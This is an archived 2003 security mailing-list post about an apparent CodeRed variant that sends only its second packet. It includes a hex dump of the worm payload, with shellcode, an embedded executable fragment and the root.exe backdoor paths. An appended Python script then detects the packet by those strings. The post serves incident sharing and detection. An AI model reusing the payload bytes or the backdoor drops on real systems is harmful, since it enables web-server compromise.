As I see it did make it to the list, here is an update.

The reason this packet hasn't been tripping the usual signatures is simple. We are receiving *only* the second packet. There is no first packet with GET /default.ida?XXXX etc. The packet itself appears to be classic CodeRed (II, I believe), but again, we're getting only the second packet. No TCP 3-way, nor first packet.

While keeping our eyes on this, the majority appears to be coming from China, but we do see some domestic (USA), Turkey, and I believe a Brazilian.

I'm curious if anyone else is seeing these second-packet-only CodeReds.

Regards,
Frank

On Fri, 2003-04-25 at 13:55, Frank Knobbe wrote:
> Greetings,
>
> we've been picking up some oddities since yesterday which look like a
> new CodeRed variant. Traditional signatures didn't identify it as such,
> but looking at the payload, it appears to be a CodeRed'ish type of bug.
> We're starting a trap for a complete session now. (So far have only
> isolated packets).
>
> That isolated packet is below. I'll post the complete session once we
> catch the whole thing.
>
> Has anyone else seen this?
>
> Regards,
> Frank
>
> ---8<---
>
> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
> ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20
> 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
> 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
> F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat
> 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_
> 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E.
> E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u.
> FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy
> 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U..
> 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL
> 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc
> 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E....
> 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u
> BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct
> 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E
> A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u
> BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele
> 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E.....
> 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E..
> 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U..
> 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna
> 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E.....
> 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname..
> 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA
> 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u.
> FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3
> 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E.....
> 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx..
> 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i...
> 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4....
> C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t.
> C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................
> E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................
> E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ......
> FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................
> FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y..
> 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........
> 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t..
> 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
> BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
> 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
> 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr
> 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
> 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j..
> 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\
> 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\
> 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe..
> 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U...
> 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP.........
> FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@...
> 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L
> 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%).........
> 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................
> 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ...
> 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@..............
> 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@...
> 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................
> 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ...............
> 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0...
> 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................
> 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`..
> 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... ....
> 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@.............
> 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............
> 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@.....
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h
> D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @..
> 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @..
> 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1
> 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j
> 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2...
> 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h
> 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@.......
> 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@..........h.$@.h
> 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h....
> E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L
> 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h
> B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5.
> 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j
> 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@...
> 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........
> 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.........h.$@.h.
> 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@
> 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@..
> C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff.
> 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217....
> 40 00 89 35 @..5
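The point of the update above is that a signature keyed on the first packet's GET /default.ida request never fires when only the second segment arrives, with no SYN in sight. The script below is an added example, not code from Frank or from the list: it rebuilds raw bytes from nine rows of the dump quoted in the post, decodes the snort flag field to show the segment is ACK-only (snort's flag column is laid out 1 2 U A P R S F, which is an assumption about the sensor that produced this dump), and matches on strings that live in this second packet itself (\CMD.EXE and the two root.exe drop paths) rather than on the missing request line.

```python
import re

# Header line and nine payload rows copied from the packet dump quoted in
# Frank's post (the rows carrying the \CMD.EXE and root.exe strings).
HEADER = "***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20"
DUMP_ROWS = r"""
> 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
> BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
> 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
> 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr
> 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
> 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j..
> 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\
> 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\
> 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe..
"""

# Strings that sit in the body of this second packet, independent of the
# GET /default.ida request that travels in the first packet.
INDICATORS = (
    b"\\CMD.EXE",
    b"\\inetpub\\scripts\\root.exe",
    b"MSADC\\root.exe",
)

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")


def parse_dump(rows):
    """Rebuild raw bytes from snort-style dump rows (16 hex pairs then ASCII).
    Leading '> ' mail quoting is tolerated; the ASCII column is ignored."""
    out = bytearray()
    for line in rows.splitlines():
        line = line.lstrip("> ").strip()
        if not line:
            continue
        for tok in line.split()[:16]:
            if not HEX_PAIR.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def tcp_flags(header):
    """Decode the 8-character flag field, assumed laid out as 1 2 U A P R S F."""
    m = re.match(r"([12UAPRSF*]{8})", header)
    if not m:
        raise ValueError("no flag field in header")
    field = m.group(1)
    return {name: name in field for name in "UAPRSF"}


def midstream_only(header):
    """True when the segment is ACK-only: no SYN, so no handshake was seen."""
    f = tcp_flags(header)
    return f["A"] and not f["S"]


def classify(header, rows):
    """Summarise one dump: payload size, whether it is mid-stream, and which
    second-packet indicators are present in the raw bytes."""
    payload = parse_dump(rows)
    hits = [s.decode() for s in INDICATORS if s in payload]
    return {
        "payload_bytes": len(payload),
        "midstream": midstream_only(header),
        "indicators": hits,
    }


if __name__ == "__main__":
    print(classify(HEADER, DUMP_ROWS))
```

On a live sensor the equivalent is a content match on these strings that does not depend on the session having been seen from the SYN, since in this traffic there is no handshake and no first packet to anchor on; the script only shows that the bytes needed for such a match are all present in the one segment that does arrive.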
This archive was generated by hypermail 2b30 : Tue Apr 29 2003 - 14:55:59 PDT